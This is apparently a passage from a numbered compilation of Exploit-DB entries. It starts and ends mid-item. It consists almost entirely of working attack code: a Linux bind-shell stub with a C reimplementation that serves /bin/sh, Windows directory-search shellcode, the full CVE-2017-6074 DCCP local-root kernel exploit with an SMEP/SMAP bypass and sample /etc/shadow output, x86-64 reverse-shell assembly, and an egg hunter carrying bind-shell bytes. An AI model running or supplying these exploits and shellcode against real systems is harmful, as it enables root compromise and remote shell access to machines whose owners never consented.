    mov al, 59
    syscall

Source: https://www.exploit-db.com/exploits/41468/
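What makes this stub small is what it leaves out: there is no bind(2). It calls listen(2) directly on the fresh socket, so the kernel auto-binds it to 0.0.0.0 on an ephemeral port, which is why the listener ends up on a random port rather than a chosen one. The operator therefore has to find the port on the target (for instance with ss -lntp) before connecting. The C program below is an added example, not part of Robert L. Taylor's listing; it performs the same syscall sequence through libc and reads the assigned port back with getsockname(2). It assumes Linux.

```c
/* Added example, not from the post above: the stub's syscall sequence in C,
   with the kernel-chosen port read back.  Linux assumed. */
#include <arpa/inet.h>
#include <netinet/in.h>
#include <stdio.h>
#include <sys/socket.h>
#include <unistd.h>

/* socket(2) then listen(2) with no bind(2), exactly as the stub does.  The
   kernel auto-binds to 0.0.0.0 and picks an ephemeral port.  Returns that
   port in host order and the listening fd via *fd_out, or -1 on error. */
int listen_unbound(int *fd_out) {
    int fd = socket(AF_INET, SOCK_STREAM, 0);         /* rax=41, rdi=2, rsi=1, rdx=0 */
    if (fd < 0) return -1;
    if (listen(fd, 0) < 0) { close(fd); return -1; }  /* rax=50, rsi=0 */
    struct sockaddr_in sa;
    socklen_t len = sizeof sa;
    if (getsockname(fd, (struct sockaddr *)&sa, &len) < 0) { close(fd); return -1; }
    *fd_out = fd;
    return ntohs(sa.sin_port);
}

/* accept(2), dup2(2) the client over fds 2,1,0 and execve(2) /bin//sh with
   NULL argv/envp, mirroring the rest of the stub.  Only returns on error. */
int serve_shell(int lfd) {
    int cfd = accept(lfd, NULL, NULL);                /* rax=43, rsi=rdx=0 */
    if (cfd < 0) return -1;
    for (int i = 2; i >= 0; i--)                      /* dup2loop: esi = 2,1,0 */
        if (dup2(cfd, i) < 0) return -1;
    execve("/bin//sh", NULL, NULL);                   /* rax=59 */
    return -1;
}

/* Smoke check that never accepts: 1 if the kernel handed out a port. */
int listen_unbound_smoke(void) {
    int fd = -1;
    int port = listen_unbound(&fd);
    int ok = port > 0 && port < 65536 && fd >= 0;
    if (fd >= 0) close(fd);
    return ok;
}

int main(void) {
    int lfd;
    int port = listen_unbound(&lfd);
    if (port < 0) { perror("listen"); return 1; }
    fprintf(stderr, "shell listening on 0.0.0.0:%d (on a target: ss -lntp)\n", port);
    return serve_shell(lfd);
}
```

Run it twice and the port differs each time; that is the behaviour the shellcode inherits. If a fixed port is required, a bind(2) before listen(2) costs a sockaddr_in on the stack and one more syscall.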
  19. # Title: Windows x86 - Executable directory search Shellcode (130 bytes)
# Date: 26-02-2017
# Author: Krzysztof Przybylski
# Platform: Win_x86
# Tested on: WinXP SP1
# Shellcode Size: 130 bytes

/*
Description:
write & exec dir searcher, starts from C:\
If a dir is found then write, execute (ping 127.1.1.1) and exit
If a write/noexec dir is found then continue
Tested on WinXP SP1 (77e6fd35;77e798fd)

i686-w64-mingw32-gcc shell.c -o golddgger.exe

Null-free version:
(gdb) disassemble
Dump of assembler code for function function:
=> 0x08048062 <+0>:  pop    ecx
   0x08048063 <+1>:  xor    eax,eax
   0x08048065 <+3>:  mov    BYTE PTR [ecx+0x64],al
   0x08048068 <+6>:  push   eax
   0x08048069 <+7>:  push   ecx
   0x0804806a <+8>:  mov    eax,0x77e6fd35
   0x0804806f <+13>: call   eax
   0x08048071 <+15>: xor    eax,eax
   0x08048073 <+17>: push   eax
   0x08048074 <+18>: mov    eax,0x77e798fd
   0x08048079 <+23>: call   eax

NULL-free shellcode (132 bytes):
"\xeb\x19\x59\x31\xc0\x88\x41\x64"
"\x50\x51\xb8"
"\x35\xfd\xe6\x77" // exec
"\xff\xd0\x31\xc0\x50\xb8"
"\xfd\x98\xe7\x77" // exit
"\xff\xd0\xe8\xe2\xff\xff\xff"
"\x63\x6d\x64\x2e\x65\x78\x65\x20"
"\x2f\x43\x20\x22\x28\x63\x64\x20"
"\x63\x3a\x5c" // C:\
"\x20\x26\x46\x4f\x52"
"\x20\x2f\x44\x20\x2f\x72\x20\x25"
"\x41\x20\x49\x4e\x20\x28\x2a\x29"
"\x20\x44\x4f\x20"
"\x65\x63\x68\x6f\x20"
"\x70\x69\x6e\x67\x20"
"\x31\x37\x32\x2e\x31\x2e\x31\x2e\x31" // 172.1.1.1 as encoded (the description says 127.1.1.1)
"\x3e\x22\x25\x41\x5c\x7a\x2e\x62"
"\x61\x74\x22\x26\x28\x63\x61\x6c"
"\x6c\x20\x22\x25\x41\x5c\x7a\x2e"
"\x62\x61\x74\x22\x26\x26\x65\x78"
"\x69\x74\x29\x29\x22";
*/

// NULL version (130 bytes):
char code[] =
"\xeb\x16\x59\x31\xc0\x50\x51\xb8"
"\x35\xfd\xe6\x77" // exec
"\xff\xd0\x31\xc0\x50\xb8"
"\xfd\x98\xe7\x77" // exit
"\xff\xd0\xe8\xe5\xff\xff\xff\x63"
"\x6d\x64\x2e\x65\x78\x65\x20\x2f"
"\x43\x20\x22\x28\x63\x64\x20"
"\x63\x3a\x5c" // C:\
"\x20\x26\x46\x4f\x52\x20\x2f\x44"
"\x20\x2f\x72\x20\x25\x41\x20\x49"
"\x4e\x20\x28\x2a\x29\x20\x44\x4f"
"\x20\x65\x63\x68\x6f\x20\x70\x69"
"\x6e\x67\x20"
"\x31\x37\x32\x2e\x31\x2e\x31\x2e\x31" // 172.1.1.1 as encoded (the description says 127.1.1.1)
"\x3e\x22\x25\x41"
"\x5c\x7a\x2e\x62\x61\x74\x22\x26"
"\x28\x63\x61\x6c\x6c\x20\x22\x25"
"\x41\x5c\x7a\x2e\x62\x61\x74\x22"
"\x26\x26\x65\x78\x69\x74\x29\x29"
"\x22\x00";

int main(int argc, char **argv)
{
    (void)argc; (void)argv;
    int (*func)();
    func = (int (*)()) code;
    (*func)();
    return 0;
}
Source: https://www.exploit-db.com/exploits/41467/
  20. //
// EDB Note: More information ~ http://seclists.org/oss-sec/2017/q1/471
//
// A proof-of-concept local root exploit for CVE-2017-6074.
// Includes a semireliable SMAP/SMEP bypass.
// Tested on 4.4.0-62-generic #83-Ubuntu kernel.
// https://github.com/xairy/kernel-exploits/tree/master/CVE-2017-6074
//
// Usage:
// $ gcc poc.c -o pwn
// $ ./pwn
// [.] namespace sandbox setup successfully
// [.] disabling SMEP & SMAP
// [.] scheduling 0xffffffff81064550(0x406e0)
// [.] waiting for the timer to execute
// [.] done
// [.] SMEP & SMAP should be off now
// [.] getting root
// [.] executing 0x402043
// [.] done
// [.] should be root now
// [.] checking if we got root
// [+] got r00t ^_^
// [!] don't kill the exploit binary, the kernel will crash
// # cat /etc/shadow
// ...
// daemon:*:17149:0:99999:7:::
// bin:*:17149:0:99999:7:::
// sys:*:17149:0:99999:7:::
// sync:*:17149:0:99999:7:::
// games:*:17149:0:99999:7:::
// ...
//
// Andrey Konovalov <andreyknvl@gmail.com>

#define _GNU_SOURCE

#include <errno.h>
#include <fcntl.h>
#include <stdarg.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#include <sched.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <arpa/inet.h>
#include <linux/if_packet.h>
#include <netinet/if_ether.h>

#define SMEP_SMAP_BYPASS 1

// Needed for local root.
#define COMMIT_CREDS 0xffffffff810a2840L
#define PREPARE_KERNEL_CRED 0xffffffff810a2c30L
#define SHINFO_OFFSET 1728

// Needed for SMEP_SMAP_BYPASS.
#define NATIVE_WRITE_CR4 0xffffffff81064550ul
#define CR4_DESIRED_VALUE 0x406e0ul
#define TIMER_OFFSET (728 + 48 + 104)

#define KMALLOC_PAD 128
#define KMALLOC_WARM 32
#define CATCH_FIRST 6
#define CATCH_AGAIN 16
#define CATCH_AGAIN_SMALL 64

// Port is incremented on each use.
static int port = 11000;

void debug(const char *msg) {
	/*
	char buffer[32];
	snprintf(&buffer[0], sizeof(buffer), "echo '%s' > /dev/kmsg\n", msg);
	system(buffer);
	*/
}

// * * * * * * * * * * * * * * Kernel structs * * * * * * * * * * * * * * * *

struct ubuf_info {
	uint64_t callback;		// void (*callback)(struct ubuf_info *, bool)
	uint64_t ctx;			// void *
	uint64_t desc;			// unsigned long
};

struct skb_shared_info {
	uint8_t nr_frags;		// unsigned char
	uint8_t tx_flags;		// __u8
	uint16_t gso_size;		// unsigned short
	uint16_t gso_segs;		// unsigned short
	uint16_t gso_type;		// unsigned short
	uint64_t frag_list;		// struct sk_buff *
	uint64_t hwtstamps;		// struct skb_shared_hwtstamps
	uint32_t tskey;			// u32
	uint32_t ip6_frag_id;		// __be32
	uint32_t dataref;		// atomic_t
	uint64_t destructor_arg;	// void *
	uint8_t frags[16][17];		// skb_frag_t frags[MAX_SKB_FRAGS];
};

struct ubuf_info ui;

void init_skb_buffer(char* buffer, void *func) {
	memset(&buffer[0], 0, 2048);
	struct skb_shared_info *ssi = (struct skb_shared_info *)&buffer[SHINFO_OFFSET];
	ssi->tx_flags = 0xff;
	ssi->destructor_arg = (uint64_t)&ui;
	ssi->nr_frags = 0;
	ssi->frag_list = 0;
	ui.callback = (unsigned long)func;
}

struct timer_list {
	void *next;
	void *prev;
	unsigned long expires;
	void (*function)(unsigned long);
	unsigned long data;
	unsigned int flags;
	int slack;
};

void init_timer_buffer(char* buffer, void *func, unsigned long arg) {
	memset(&buffer[0], 0, 2048);
	struct timer_list* timer = (struct timer_list *)&buffer[TIMER_OFFSET];
	timer->next = 0;
	timer->prev = 0;
	timer->expires = 4294943360;
	timer->function = func;
	timer->data = arg;
	timer->flags = 1;
	timer->slack = -1;
}

// * * * * * * * * * * * * * * * Trigger * * * * * * * * * * * * * * * * * *

struct dccp_handle {
	struct sockaddr_in6 sa;
	int s1;
	int s2;
};

void dccp_init(struct dccp_handle *handle, int port) {
	handle->sa.sin6_family = AF_INET6;
	handle->sa.sin6_port = htons(port);
	inet_pton(AF_INET6, "::1", &handle->sa.sin6_addr);
	handle->sa.sin6_flowinfo = 0;
	handle->sa.sin6_scope_id = 0;

	handle->s1 = socket(PF_INET6, SOCK_DCCP, IPPROTO_IP);
	if (handle->s1 == -1) {
		perror("socket(SOCK_DCCP)");
		exit(EXIT_FAILURE);
	}

	int rv = bind(handle->s1, &handle->sa, sizeof(handle->sa));
	if (rv != 0) {
		perror("bind()");
		exit(EXIT_FAILURE);
	}

	rv = listen(handle->s1, 0x9);
	if (rv != 0) {
		perror("listen()");
		exit(EXIT_FAILURE);
	}

	int optval = 8;
	rv = setsockopt(handle->s1, IPPROTO_IPV6, IPV6_RECVPKTINFO, &optval, sizeof(optval));
	if (rv != 0) {
		perror("setsockopt(IPV6_RECVPKTINFO)");
		exit(EXIT_FAILURE);
	}

	handle->s2 = socket(PF_INET6, SOCK_DCCP, IPPROTO_IP);
	if (handle->s1 == -1) {
		perror("socket(SOCK_DCCP)");
		exit(EXIT_FAILURE);
	}
}

void dccp_kmalloc_kfree(struct dccp_handle *handle) {
	int rv = connect(handle->s2, &handle->sa, sizeof(handle->sa));
	if (rv != 0) {
		perror("connect(SOCK_DCCP)");
		exit(EXIT_FAILURE);
	}
}

void dccp_kfree_again(struct dccp_handle *handle) {
	int rv = shutdown(handle->s1, SHUT_RDWR);
	if (rv != 0) {
		perror("shutdown(SOCK_DCCP)");
		exit(EXIT_FAILURE);
	}
}

void dccp_destroy(struct dccp_handle *handle) {
	close(handle->s1);
	close(handle->s2);
}

// * * * * * * * * * * * * * * Heap spraying * * * * * * * * * * * * * * * * *

struct udp_fifo_handle {
	int fds[2];
};

void udp_fifo_init(struct udp_fifo_handle* handle) {
	int rv = socketpair(AF_LOCAL, SOCK_DGRAM, 0, handle->fds);
	if (rv != 0) {
		perror("socketpair()");
		exit(EXIT_FAILURE);
	}
}

void udp_fifo_destroy(struct udp_fifo_handle* handle) {
	close(handle->fds[0]);
	close(handle->fds[1]);
}

void udp_fifo_kmalloc(struct udp_fifo_handle* handle, char *buffer) {
	int rv = send(handle->fds[0], buffer, 1536, 0);
	if (rv != 1536) {
		perror("send()");
		exit(EXIT_FAILURE);
	}
}

void udp_fifo_kmalloc_small(struct udp_fifo_handle* handle) {
	char buffer[128];
	int rv = send(handle->fds[0], &buffer[0], 128, 0);
	if (rv != 128) {
		perror("send()");
		exit(EXIT_FAILURE);
	}
}

void udp_fifo_kfree(struct udp_fifo_handle* handle) {
	char buffer[2048];
	int rv = recv(handle->fds[1], &buffer[0], 1536, 0);
	if (rv != 1536) {
		perror("recv()");
		exit(EXIT_FAILURE);
	}
}

int timer_kmalloc() {
	int s = socket(AF_PACKET, SOCK_DGRAM, htons(ETH_P_ARP));
	if (s == -1) {
		perror("socket(SOCK_DGRAM)");
		exit(EXIT_FAILURE);
	}
	return s;
}

#define CONF_RING_FRAMES 1

void timer_schedule(int handle, int timeout) {
	int optval = TPACKET_V3;
	int rv = setsockopt(handle, SOL_PACKET, PACKET_VERSION, &optval, sizeof(optval));
	if (rv != 0) {
		perror("setsockopt(PACKET_VERSION)");
		exit(EXIT_FAILURE);
	}

	struct tpacket_req3 tp;
	memset(&tp, 0, sizeof(tp));
	tp.tp_block_size = CONF_RING_FRAMES * getpagesize();
	tp.tp_block_nr = 1;
	tp.tp_frame_size = getpagesize();
	tp.tp_frame_nr = CONF_RING_FRAMES;
	tp.tp_retire_blk_tov = timeout;

	rv = setsockopt(handle, SOL_PACKET, PACKET_RX_RING, (void *)&tp, sizeof(tp));
	if (rv != 0) {
		perror("setsockopt(PACKET_RX_RING)");
		exit(EXIT_FAILURE);
	}
}

void socket_sendmmsg(int sock, char *buffer) {
	struct mmsghdr msg[1];

	msg[0].msg_hdr.msg_iovlen = 0;

	// Buffer to kmalloc.
	msg[0].msg_hdr.msg_control = &buffer[0];
	msg[0].msg_hdr.msg_controllen = 2048;

	// Make sendmmsg exit easy with EINVAL.
	msg[0].msg_hdr.msg_name = "root";
	msg[0].msg_hdr.msg_namelen = 1;

	int rv = syscall(__NR_sendmmsg, sock, msg, 1, 0);
	if (rv == -1 && errno != EINVAL) {
		perror("[-] sendmmsg()");
		exit(EXIT_FAILURE);
	}
}

void sendmmsg_kmalloc_kfree(int port, char *buffer) {
	int sock[2];

	int rv = socketpair(AF_LOCAL, SOCK_DGRAM, 0, sock);
	if (rv != 0) {
		perror("socketpair()");
		exit(EXIT_FAILURE);
	}

	socket_sendmmsg(sock[0], buffer);

	close(sock[0]);
}

// * * * * * * * * * * * * * * Heap warming * * * * * * * * * * * * * * * * *

void dccp_connect_pad(struct dccp_handle *handle, int port) {
	handle->sa.sin6_family = AF_INET6;
	handle->sa.sin6_port = htons(port);
	inet_pton(AF_INET6, "::1", &handle->sa.sin6_addr);
	handle->sa.sin6_flowinfo = 0;
	handle->sa.sin6_scope_id = 0;

	handle->s1 = socket(PF_INET6, SOCK_DCCP, IPPROTO_IP);
	if (handle->s1 == -1) {
		perror("socket(SOCK_DCCP)");
		exit(EXIT_FAILURE);
	}

	int rv = bind(handle->s1, &handle->sa, sizeof(handle->sa));
	if (rv != 0) {
		perror("bind()");
		exit(EXIT_FAILURE);
	}

	rv = listen(handle->s1, 0x9);
	if (rv != 0) {
		perror("listen()");
		exit(EXIT_FAILURE);
	}

	handle->s2 = socket(PF_INET6, SOCK_DCCP, IPPROTO_IP);
	if (handle->s1 == -1) {
		perror("socket(SOCK_DCCP)");
		exit(EXIT_FAILURE);
	}

	rv = connect(handle->s2, &handle->sa, sizeof(handle->sa));
	if (rv != 0) {
		perror("connect(SOCK_DCCP)");
		exit(EXIT_FAILURE);
	}
}

void dccp_kmalloc_pad() {
	int i;
	struct dccp_handle handle;
	for (i = 0; i < 4; i++) {
		dccp_connect_pad(&handle, port++);
	}
}

void timer_kmalloc_pad() {
	int i;
	for (i = 0; i < 4; i++) {
		socket(AF_PACKET, SOCK_DGRAM, htons(ETH_P_ARP));
	}
}

void udp_kmalloc_pad() {
	int i, j;
	char dummy[2048];
	struct udp_fifo_handle uh[16];
	for (i = 0; i < KMALLOC_PAD / 16; i++) {
		udp_fifo_init(&uh[i]);
		for (j = 0; j < 16; j++)
			udp_fifo_kmalloc(&uh[i], &dummy[0]);
	}
}

void kmalloc_pad() {
	debug("dccp kmalloc pad");
	dccp_kmalloc_pad();
	debug("timer kmalloc pad");
	timer_kmalloc_pad();
	debug("udp kmalloc pad");
	udp_kmalloc_pad();
}

void udp_kmalloc_warm() {
	int i, j;
	char dummy[2048];
	struct udp_fifo_handle uh[16];
	for (i = 0; i < KMALLOC_WARM / 16; i++) {
		udp_fifo_init(&uh[i]);
		for (j = 0; j < 16; j++)
			udp_fifo_kmalloc(&uh[i], &dummy[0]);
	}
	for (i = 0; i < KMALLOC_WARM / 16; i++) {
		for (j = 0; j < 16; j++)
			udp_fifo_kfree(&uh[i]);
	}
}

void kmalloc_warm() {
	udp_kmalloc_warm();
}

// * * * * * * * * * * * * * Disabling SMEP/SMAP * * * * * * * * * * * * * * *

// Executes func(arg) from interrupt context multiple times.
void kernel_exec_irq(void *func, unsigned long arg) {
	int i;
	struct dccp_handle dh;
	struct udp_fifo_handle uh1, uh2, uh3, uh4;
	char dummy[2048];
	char buffer[2048];

	printf("[.] scheduling %p(%p)\n", func, (void *)arg);

	memset(&dummy[0], 0xc3, 2048);
	init_timer_buffer(&buffer[0], func, arg);

	udp_fifo_init(&uh1);
	udp_fifo_init(&uh2);
	udp_fifo_init(&uh3);
	udp_fifo_init(&uh4);

	debug("kmalloc pad");
	kmalloc_pad();

	debug("kmalloc warm");
	kmalloc_warm();

	debug("dccp init");
	dccp_init(&dh, port++);

	debug("dccp kmalloc kfree");
	dccp_kmalloc_kfree(&dh);

	debug("catch 1");
	for (i = 0; i < CATCH_FIRST; i++)
		udp_fifo_kmalloc(&uh1, &dummy[0]);

	debug("dccp kfree again");
	dccp_kfree_again(&dh);

	debug("catch 2");
	for (i = 0; i < CATCH_FIRST; i++)
		udp_fifo_kmalloc(&uh2, &dummy[0]);

	int timers[CATCH_FIRST];

	debug("catch 1 -> timer");
	for (i = 0; i < CATCH_FIRST; i++) {
		udp_fifo_kfree(&uh1);
		timers[i] = timer_kmalloc();
	}

	debug("catch 1 small");
	for (i = 0; i < CATCH_AGAIN_SMALL; i++)
		udp_fifo_kmalloc_small(&uh4);

	debug("schedule timers");
	for (i = 0; i < CATCH_FIRST; i++)
		timer_schedule(timers[i], 500);

	debug("catch 2 -> overwrite timers");
	for (i = 0; i < CATCH_FIRST; i++) {
		udp_fifo_kfree(&uh2);
		udp_fifo_kmalloc(&uh3, &buffer[0]);
	}

	debug("catch 2 small");
	for (i = 0; i < CATCH_AGAIN_SMALL; i++)
		udp_fifo_kmalloc_small(&uh4);

	printf("[.] waiting for the timer to execute\n");
	debug("wait");
	sleep(1);

	printf("[.] done\n");
}

void disable_smep_smap() {
	printf("[.] disabling SMEP & SMAP\n");
	kernel_exec_irq((void *)NATIVE_WRITE_CR4, CR4_DESIRED_VALUE);
	printf("[.] SMEP & SMAP should be off now\n");
}

// * * * * * * * * * * * * * * * Getting root * * * * * * * * * * * * * * * * *

// Executes func() from process context.
void kernel_exec(void *func) {
	int i;
	struct dccp_handle dh;
	struct udp_fifo_handle uh1, uh2, uh3;
	char dummy[2048];
	char buffer[2048];

	printf("[.] executing %p\n", func);

	memset(&dummy[0], 0, 2048);
	init_skb_buffer(&buffer[0], func);

	udp_fifo_init(&uh1);
	udp_fifo_init(&uh2);
	udp_fifo_init(&uh3);

	debug("kmalloc pad");
	kmalloc_pad();

	debug("kmalloc warm");
	kmalloc_warm();

	debug("dccp init");
	dccp_init(&dh, port++);

	debug("dccp kmalloc kfree");
	dccp_kmalloc_kfree(&dh);

	debug("catch 1");
	for (i = 0; i < CATCH_FIRST; i++)
		udp_fifo_kmalloc(&uh1, &dummy[0]);

	debug("dccp kfree again:");
	dccp_kfree_again(&dh);

	debug("catch 2");
	for (i = 0; i < CATCH_FIRST; i++)
		udp_fifo_kmalloc(&uh2, &dummy[0]);

	debug("catch 1 -> overwrite");
	for (i = 0; i < CATCH_FIRST; i++) {
		udp_fifo_kfree(&uh1);
		sendmmsg_kmalloc_kfree(port++, &buffer[0]);
	}

	debug("catch 2 -> free & trigger");
	for (i = 0; i < CATCH_FIRST; i++)
		udp_fifo_kfree(&uh2);

	debug("catch 1 & 2");
	for (i = 0; i < CATCH_AGAIN; i++)
		udp_fifo_kmalloc(&uh3, &dummy[0]);

	printf("[.] done\n");
}

typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds = (_commit_creds)COMMIT_CREDS;
_prepare_kernel_cred prepare_kernel_cred = (_prepare_kernel_cred)PREPARE_KERNEL_CRED;

void get_root_payload(void) {
	commit_creds(prepare_kernel_cred(0));
}

void get_root() {
	printf("[.] getting root\n");
	kernel_exec(&get_root_payload);
	printf("[.] should be root now\n");
}

// * * * * * * * * * * * * * * * * * Main * * * * * * * * * * * * * * * * * *

void exec_shell() {
	char *shell = "/bin/bash";
	char *args[] = {shell, "-i", NULL};
	execve(shell, args, NULL);
}

void fork_shell() {
	pid_t rv;

	rv = fork();
	if (rv == -1) {
		perror("fork()");
		exit(EXIT_FAILURE);
	}

	if (rv == 0) {
		exec_shell();
	}
}

bool is_root() {
	// We can't simple check uid, since we're running inside a namespace
	// with uid set to 0. Try opening /etc/shadow instead.
	int fd = open("/etc/shadow", O_RDONLY);
	if (fd == -1)
		return false;
	close(fd);
	return true;
}

void check_root() {
	printf("[.] checking if we got root\n");

	if (!is_root()) {
		printf("[-] something went wrong =(\n");
		printf("[!] don't kill the exploit binary, the kernel will crash\n");
		return;
	}

	printf("[+] got r00t ^_^\n");
	printf("[!] don't kill the exploit binary, the kernel will crash\n");

	// Fork and exec instead of just doing the exec to avoid freeing
	// skbuffs and prevent crashes due to a allocator corruption.
	fork_shell();
}

static bool write_file(const char* file, const char* what, ...) {
	char buf[1024];
	va_list args;
	va_start(args, what);
	vsnprintf(buf, sizeof(buf), what, args);
	va_end(args);
	buf[sizeof(buf) - 1] = 0;
	int len = strlen(buf);

	int fd = open(file, O_WRONLY | O_CLOEXEC);
	if (fd == -1)
		return false;
	if (write(fd, buf, len) != len) {
		close(fd);
		return false;
	}
	close(fd);
	return true;
}

void setup_sandbox() {
	int real_uid = getuid();
	int real_gid = getgid();

	if (unshare(CLONE_NEWUSER) != 0) {
		perror("unshare(CLONE_NEWUSER)");
		exit(EXIT_FAILURE);
	}

	if (unshare(CLONE_NEWNET) != 0) {
		perror("unshare(CLONE_NEWUSER)");
		exit(EXIT_FAILURE);
	}

	if (!write_file("/proc/self/setgroups", "deny")) {
		perror("write_file(/proc/self/set_groups)");
		exit(EXIT_FAILURE);
	}
	if (!write_file("/proc/self/uid_map", "0 %d 1\n", real_uid)){
		perror("write_file(/proc/self/uid_map)");
		exit(EXIT_FAILURE);
	}
	if (!write_file("/proc/self/gid_map", "0 %d 1\n", real_gid)) {
		perror("write_file(/proc/self/gid_map)");
		exit(EXIT_FAILURE);
	}

	cpu_set_t my_set;
	CPU_ZERO(&my_set);
	CPU_SET(0, &my_set);
	if (sched_setaffinity(0, sizeof(my_set), &my_set) != 0) {
		perror("sched_setaffinity()");
		exit(EXIT_FAILURE);
	}

	if (system("/sbin/ifconfig lo up") != 0) {
		perror("system(/sbin/ifconfig lo up)");
		exit(EXIT_FAILURE);
	}

	printf("[.] namespace sandbox setup successfully\n");
}

int main() {
	setup_sandbox();

#if SMEP_SMAP_BYPASS
	disable_smep_smap();
#endif

	get_root();
	check_root();

	while (true) {
		sleep(100);
	}

	return 0;
}

Source: https://www.exploit-db.com/exploits/41458/
  21. ;The MIT License (MIT)
;Copyright (c) 2017 Robert L. Taylor
;Permission is hereby granted, free of charge, to any person obtaining a
;copy of this software and associated documentation files (the “Software”),
;to deal in the Software without restriction, including without limitation
;the rights to use, copy, modify, merge, publish, distribute, sublicense,
;and/or sell copies of the Software, and to permit persons to whom the
;Software is furnished to do so, subject to the following conditions:
;The above copyright notice and this permission notice shall be included
;in all copies or substantial portions of the Software.
;The Software is provided “as is”, without warranty of any kind, express or
;implied, including but not limited to the warranties of merchantability,
;fitness for a particular purpose and noninfringement. In no event shall the
;authors or copyright holders be liable for any claim, damages or other
;liability, whether in an action of contract, tort or otherwise, arising
;from, out of or in connection with the software or the use or other
;dealings in the Software.
;
; For a detailed explanation of this shellcode see my blog post:
; http://a41l4.blogspot.ca/2017/02/assignment-2b.html

global _start
section .text
_start:
; Socket
push 41
pop rax
push 2
pop rdi
push 1
pop rsi
cdq
syscall
; Connect
xchg edi, eax
push rdx
mov rbx, 0xfeffff80a3eefffd ; not encoded 0x0100007f5c110002
not rbx
push rbx
mov al, 42
push rsp
pop rsi
mov dl, 16
syscall
; Dup 2
push 3
pop rsi
dup2loop:
mov al, 33
dec esi
syscall
loopnz dup2loop
; Execve
; rax and rsi are zero from the result of the last dup2 syscall and loop
push rax ; zero terminator for the following string that we are pushing
mov rbx, '/bin//sh'
push rbx
; store /bin//sh address in RDI
push rsp
pop rdi
cdq ; zero rdx
mov al, 59
syscall

Source: https://www.exploit-db.com/exploits/41398/
  22. /**
  Copyright © 2017 Odzhan. All Rights Reserved.

  Redistribution and use in source and binary forms, with or without
  modification, are permitted provided that the following conditions are
  met:

  1. Redistributions of source code must retain the above copyright
  notice, this list of conditions and the following disclaimer.

  2. Redistributions in binary form must reproduce the above copyright
  notice, this list of conditions and the following disclaimer in the
  documentation and/or other materials provided with the distribution.

  3. The name of the author may not be used to endorse or promote products
  derived from this software without specific prior written permission.

  THIS SOFTWARE IS PROVIDED BY AUTHORS "AS IS" AND ANY EXPRESS OR
  IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
  WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
  ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT,
  INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
  (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
  SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
  HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
  STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING
  IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
  POSSIBILITY OF SUCH DAMAGE.

; 38 byte Egg Hunter using sys_access() for x86-64 Linux
;
    bits 64

    xor    edi, edi         ; rdi = 0
    mul    edi              ; rax = 0, rdx = 0
    xchg   eax, esi         ; rsi = F_OK
    mov    dh, 10h          ; rdx = 4096
nxt_page:
    add    rdi, rdx         ; advance 4096 bytes
nxt_addr:
    push   rdi              ; save page address
    add    rdi, 8           ; try read 8 bytes ahead
    push   21
    pop    rax              ; rax = sys_access
    syscall
    pop    rdi              ; restore rdi
    cmp    al, 0xF2         ; -EFAULT means bad address
    je     nxt_page         ; keep going until good read
    ; put your own signature here
    mov    eax, 0xDEADC0DE
    scasd
    jne    nxt_addr
    scasd
    jne    nxt_addr
    jmp    rdi              ; jump into shellcode
*/

#include <stdio.h>
#include <string.h>
#include <stdint.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <sys/mman.h>

#define EGG64_SIZE 38

char EGG64[] = {
/* 0000 */ "\x31\xff"                  /* xor edi, edi */
/* 0002 */ "\xf7\xe7"                  /* mul edi */
/* 0004 */ "\x96"                      /* xchg esi, eax */
/* 0005 */ "\xb6\x10"                  /* mov dh, 0x10 */
/* 0007 */ "\x48\x01\xd7"              /* add rdi, rdx */
/* 000A */ "\x57"                      /* push rdi */
/* 000B */ "\x48\x83\xc7\x08"          /* add rdi, 0x8 */
/* 000F */ "\x6a\x15"                  /* push 0x15 */
/* 0011 */ "\x58"                      /* pop rax */
/* 0012 */ "\x0f\x05"                  /* syscall */
/* 0014 */ "\x5f"                      /* pop rdi */
/* 0015 */ "\x3c\xf2"                  /* cmp al, 0xf2 */
/* 0017 */ "\x74\xee"                  /* jz 0x7 */
/* 0019 */ "\xb8\xde\xc0\xad\xde"      /* mov eax, 0xdeadc0de */
/* 001E */ "\xaf"                      /* scasd */
/* 001F */ "\x75\xe9"                  /* jnz 0xa */
/* 0021 */ "\xaf"                      /* scasd */
/* 0022 */ "\x75\xe6"                  /* jnz 0xa */
/* 0024 */ "\xff\xe7"                  /* jmp rdi */
};

// sig is 0xDEADC0DE
#define EGG_SIG "\xDE\xC0\xAD\xDE"

// 71 byte bind shell for x86-64 Linux.
// listens on 0.0.0.0:1234
//
// port offset is 0x010
//
char BS[] = {
EGG_SIG EGG_SIG
/* 0000 */ "\x6a\x29"                                  /* push 0x29 */
/* 0002 */ "\x58"                                      /* pop rax */
/* 0003 */ "\x6a\x01"                                  /* push 0x1 */
/* 0005 */ "\x5e"                                      /* pop rsi */
/* 0006 */ "\x6a\x02"                                  /* push 0x2 */
/* 0008 */ "\x5f"                                      /* pop rdi */
/* 0009 */ "\x99"                                      /* cdq */
/* 000A */ "\x0f\x05"                                  /* syscall */
/* 000C */ "\x97"                                      /* xchg edi, eax */
/* 000D */ "\xbb\x02\xff\x04\xd2"                      /* mov ebx, 0xd204ff02 */
/* 0012 */ "\xfe\xc7"                                  /* inc bh */
/* 0014 */ "\x53"                                      /* push rbx */
/* 0015 */ "\x54"                                      /* push rsp */
/* 0016 */ "\x5e"                                      /* pop rsi */
/* 0017 */ "\xb2\x10"                                  /* mov dl, 0x10 */
/* 0019 */ "\xb0\x31"                                  /* mov al, 0x31 */
